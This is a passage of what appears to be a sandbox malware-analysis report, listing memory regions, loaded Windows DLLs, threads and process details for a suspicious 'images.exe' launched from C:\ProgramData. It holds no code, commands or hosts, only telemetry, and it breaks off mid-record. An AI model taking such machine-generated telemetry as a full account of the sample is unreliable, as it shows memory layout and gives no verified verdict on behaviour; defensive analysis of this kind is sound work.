start_va = 0x7ffd8ea40000 end_va = 0x7ffd8ea98fff monitored = 0 entry_point = 0x7ffd8ea4fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 575 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 576 start_va = 0x7ffda9000000 end_va = 0x7ffda927cfff monitored = 0 entry_point = 0x7ffda90d4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 577 start_va = 0x7ffda8ba0000 end_va = 0x7ffda8cbbfff monitored = 0 entry_point = 0x7ffda8be02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 578 start_va = 0x7ffda7cd0000 end_va = 0x7ffda7d39fff monitored = 0 entry_point = 0x7ffda7d06d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 579 start_va = 0x7ffda8ea0000 end_va = 0x7ffda8ff5fff monitored = 0 entry_point = 0x7ffda8eaa8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 580 start_va = 0x7ffdab400000 end_va = 0x7ffdab585fff monitored = 0 entry_point = 0x7ffdab44ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 581 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 582 start_va = 0x7ffda96b0000 end_va = 0x7ffda97f2fff monitored = 0 entry_point = 0x7ffda96d8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 583 start_va = 0x7ffdab030000 end_va = 0x7ffdab08afff monitored = 0 entry_point = 0x7ffdab0438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 584 start_va = 0x7ffda89f0000 end_va = 0x7ffda8a2afff monitored = 0 entry_point = 0x7ffda89f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 585 start_va = 0x7ffda8cc0000 end_va = 0x7ffda8d80fff monitored = 0 entry_point = 0x7ffda8ce0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 586 start_va = 0x7ffda6100000 end_va = 0x7ffda6285fff monitored = 0 entry_point = 0x7ffda614d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 601 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 602 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 603 start_va = 0x880000 end_va = 0xa07fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 604 start_va = 0xa50000 end_va = 0xa5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 605 start_va = 0xa60000 end_va = 0xbe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 606 start_va = 0xbf0000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bf0000" filename = "" Region: id = 607 start_va = 0x600000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 627 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 628 start_va = 0x640000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 629 start_va = 0x7ffda9870000 end_va = 0x7ffdaadcefff monitored = 0 entry_point = 0x7ffda99d11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 645 start_va = 0x7ffda8100000 end_va = 0x7ffda8142fff monitored = 0 entry_point = 0x7ffda8114b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 646 start_va = 0x7ffda8320000 end_va = 0x7ffda8963fff monitored = 0 entry_point = 0x7ffda84e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 647 start_va = 0x7ffdaaee0000 end_va = 0x7ffdaaf86fff monitored = 0 entry_point = 0x7ffdaaef58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 648 start_va = 0x7ffdaadd0000 end_va = 0x7ffdaae21fff monitored = 0 entry_point = 0x7ffdaaddf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 649 start_va = 0x7ffda7c00000 end_va = 0x7ffda7c0efff monitored = 0 entry_point = 0x7ffda7c03210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 650 start_va = 0x7ffda8260000 end_va = 0x7ffda8314fff monitored = 0 entry_point = 0x7ffda82a22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 651 start_va = 0x7ffda7bb0000 end_va = 0x7ffda7bfafff monitored = 0 entry_point = 0x7ffda7bb35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 652 start_va = 0x7ffda7c10000 end_va = 0x7ffda7c23fff monitored = 0 entry_point = 0x7ffda7c152e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 653 start_va = 0x7ffda6530000 end_va = 0x7ffda65c5fff monitored = 0 entry_point = 0x7ffda6555570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 654 start_va = 0x650000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 655 start_va = 0x1ff0000 end_va = 0x2326fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 656 start_va = 0x2330000 end_va = 0x242ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 657 start_va = 0x2430000 end_va = 0x262ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 658 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 659 start_va = 0x730000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 660 start_va = 0x7ffdab2a0000 end_va = 0x7ffdab3f9fff monitored = 0 entry_point = 0x7ffdab2e38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 661 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 662 start_va = 0x2630000 end_va = 0x26ebfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002630000" filename = "" Region: id = 663 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 664 start_va = 0x7ffda5430000 end_va = 0x7ffda5451fff monitored = 0 entry_point = 0x7ffda5431a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 665 start_va = 0x7ffda62f0000 end_va = 0x7ffda6302fff monitored = 0 entry_point = 0x7ffda62f2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 666 start_va = 0x7ffda79c0000 end_va = 0x7ffda7a15fff monitored = 0 entry_point = 0x7ffda79d0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 667 start_va = 0x60000 end_va = 0x66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 668 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 669 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 670 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 671 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 672 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 673 start_va = 0x690000 end_va = 0x690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 674 start_va = 0x6a0000 end_va = 0x6a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 675 start_va = 0x7ffd9c660000 end_va = 0x7ffd9c8d3fff monitored = 0 entry_point = 0x7ffd9c6d0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 676 start_va = 0x6b0000 end_va = 0x6b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 677 start_va = 0x6c0000 end_va = 0x6c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Thread: id = 5 os_tid = 0xea8 Thread: id = 7 os_tid = 0xe00 Thread: id = 8 os_tid = 0xb24 Thread: id = 10 os_tid = 0xc48 Process: id = "4" image_name = "images.exe" filename = "c:\\programdata\\images.exe" page_root = "0x1d05000" os_pid = "0x528" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x134c" cmd_line = "\"C:\\ProgramData\\images.exe\"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 548 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 549 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 550 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 551 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 552 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 553 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 554 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 555 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 556 start_va = 0x400000 end_va = 0x555fff monitored = 1 entry_point = 0x553b50 region_type = mapped_file name = "images.exe" filename = "\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe") Region: id = 557 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 558 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 559 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 560 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 561 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 562 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 563 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 587 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 588 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 589 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 590 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 591 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 592 start_va = 0x630000 end_va = 0x90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 593 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 594 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 595 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 596 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 597 start_va = 0x560000 end_va = 0x61dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 598 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 599 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 600 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 608 start_va = 0x74810000 end_va = 0x7488afff monitored = 0 entry_point = 0x7482e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 609 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 610 start_va = 0x630000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 611 start_va = 0x670000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 612 start_va = 0x810000 end_va = 0x90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 613 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 614 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 615 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 616 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 617 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 618 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 619 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 620 start_va = 0x753d0000 end_va = 0x754bafff monitored = 0 entry_point = 0x7540d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 621 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 622 start_va = 0x74660000 end_va = 0x746f1fff monitored = 0 entry_point = 0x74698cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 623 start_va = 0x75db0000 end_va = 0x771aefff monitored = 0 entry_point = 0x75f6b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 624 start_va = 0x77640000 end_va = 0x77676fff monitored = 0 entry_point = 0x77643b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 625 start_va = 0x74ed0000 end_va = 0x753c8fff monitored = 0 entry_point = 0x750d7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 626 start_va = 0x77680000 end_va = 0x776c4fff monitored = 0 entry_point = 0x7769de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 630 start_va = 0x77730000 end_va = 0x7773bfff monitored = 0 entry_point = 0x77733930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 631 start_va = 0x77390000 end_va = 0x7741cfff monitored = 0 entry_point = 0x773d9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 632 start_va = 0x74e70000 end_va = 0x74eb3fff monitored = 0 entry_point = 0x74e77410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 633 start_va = 0x77320000 end_va = 0x7732efff monitored = 0 entry_point = 0x77322e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 634 start_va = 0x910000 end_va = 0xa3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 635 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 636 start_va = 0xa40000 end_va = 0xbc7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 637 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 638 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 639 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 640 start_va = 0xbd0000 end_va = 0xd50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bd0000" filename = "" Region: id = 641 start_va = 0xd60000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 642 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 643 start_va = 0x770000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 644 start_va = 0x2160000 end_va = 0x2b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 741 start_va = 0x2b60000 end_va = 0x2cb3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 743 start_va = 0x74200000 end_va = 0x7421afff monitored = 0 entry_point = 0x74209050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 744 start_va = 0x717f0000 end_va = 0x7196dfff monitored = 0 entry_point = 0x7186c630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 745 start_va = 0x720c0000 end_va = 0x7238afff monitored = 0 entry_point = 0x722fc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 746 start_va = 0x75b90000 end_va = 0x75beefff monitored = 0 entry_point = 0x75b94af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 747 start_va = 0x74d00000 end_va = 0x74d12fff monitored = 0 entry_point = 0x74d01d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 748 start_va = 0x6f7e0000 end_va = 0x6f7f4fff monitored = 0 entry_point = 0x6f7e5210 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 749 start_va = 0x75830000 end_va = 0x759a7fff monitored = 0 entry_point = 0x75888a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 750 start_va = 0x754c0000 end_va = 0x754cdfff monitored = 0 entry_point = 0x754c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 751 start_va = 0x74800000 end_va = 0x74805fff monitored = 0 entry_point = 0x74801460 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 752 start_va = 0x7b0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 753 start_va = 0x910000 end_va = 0xa0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 754 start_va = 0xa30000 end_va = 0xa3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 755 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 756 start_va = 0x74d20000 end_va = 0x74da3fff monitored = 0 entry_point = 0x74d46220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 757 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 758 start_va = 